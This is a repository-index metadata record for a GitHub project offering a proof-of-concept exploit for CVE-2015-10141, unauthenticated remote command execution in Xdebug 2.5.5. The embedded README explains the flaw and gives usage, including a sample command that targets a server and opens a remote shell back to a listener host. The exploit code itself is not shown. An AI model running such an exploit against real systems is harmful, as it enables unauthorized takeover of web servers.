{"id":30294508,"url":"https://github.com/d3ext/cve-2015-10141","last_synced_at":"2025-08-17T01:35:24.805Z","repository":{"id":41803335,"uuid":"510351282","full_name":"D3Ext/CVE-2015-10141","owner":"D3Ext","description":"POC exploit for CVE-2015-10141","archived":false,"fork":false,"pushed_at":"2025-08-11T15:11:04.000Z","size":59,"stargazers_count":30,"open_issues_count":0,"forks_count":9,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-08-14T07:48:53.875Z","etag":null,"topics":["cve-2015-10141","python"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/D3Ext.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2022-07-04T12:30:17.000Z","updated_at":"2025-08-11T15:31:04.000Z","dependencies_parsed_at":"2025-04-10T03:17:44.738Z","dependency_job_id":"40d2cf62-f896-4260-a510-4d20608e2860","html_url":"https://github.com/D3Ext/CVE-2015-10141","commit_stats":null,"previous_names":["d3ext/xdebug-exploit"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/D3Ext/CVE-2015-10141","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2FCVE-2015-10141","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2FCVE-2015-10141/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2FCVE-2015-10141/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2FCVE-2015-10141/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/D3Ext","download_url":"https://codeload.github.com/D3Ext/CVE-2015-10141/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/D3Ext%2FCVE-2015-10141/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":270796216,"owners_count":24647319,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-08-16T02:00:11.002Z","response_time":91,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve-2015-10141","python"],"created_at":"2025-08-17T01:35:18.019Z","updated_at":"2025-08-17T01:35:24.760Z","avatar_url":"https://github.com/D3Ext.png","language":"Python","readme":"# CVE-2015-10141\n\n```\n# Exploit Title: xdebug Unauthenticated Command Execution\n# Exploit Author: D3Ext\n# Vendor Homepage: https://xdebug.org/\n# Sofware Link: https://pecl.php.net/package/xdebug/2.5.5/windows\n# Version: 2.5.5\n# Tested on: Kali Linux 2025\n# CVE: CVE-2015-10141\n```\n\n## Explanation\n\nAn unauthenticated OS command injection vulnerability exists within Xdebug versions 2.5.5 and earlier, a PHP debugging extension. When remote debugging is enabled, Xdebug listens on port 9000 and accepts debugger protocol commands without authentication. An attacker can send a crafted eval command over this interface to execute arbitrary PHP code, which may invoke system-level functions such as system() or passthru(). This results in full compromise of the host under the privileges of the web server user.\n\n## Usage\n\n```\nusage: CVE-2015-10141.py [-h] -u URL -l LHOST\n\nCVE-2015-10141 - xdebug v2.5.5 RCE Exploit\n\noptions:\n  -h, --help         show this help message and exit\n  -u, --url URL      URL of the target\n  -l, --lhost LHOST  LHOST to trigger the RCE\n```\n\nJust execute the exploit and provide a valid URL with a PHP file like `index.php` and the local host. Then the exploit will try to establish a pseudo-terminal which allows you to execute commands remotely\n\n```sh\npython3 exploit.py -u http://10.10.10.83/index.php -l 10.10.16.3\n```\n\nTake into account that in some cases the output won't be reflected at all and you will only see the first line of the executed command, this is not a problem of the script, the vuln works like this)\n\n## References\n\n```\nhttps://github.com/advisories/GHSA-267w-63f8-m896\nhttps://www.exploit-db.com/exploits/44568\nhttps://www.rapid7.com/db/modules/exploit/unix/http/xdebug_unauth_exec/\nhttps://nvd.nist.gov/vuln/detail/CVE-2015-10141\nhttps://www.wiz.io/vulnerability-database/cve/cve-2015-10141\nhttps://feedly.com/cve/CVE-2015-10141\nhttps://www.tenable.com/plugins/nessus/112210\n```\n\n## License\n\nThis project is under MIT license\n\nCopyright © 2025, *D3Ext*\n\n\n\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fd3ext%2Fcve-2015-10141","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fd3ext%2Fcve-2015-10141","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fd3ext%2Fcve-2015-10141/lists"}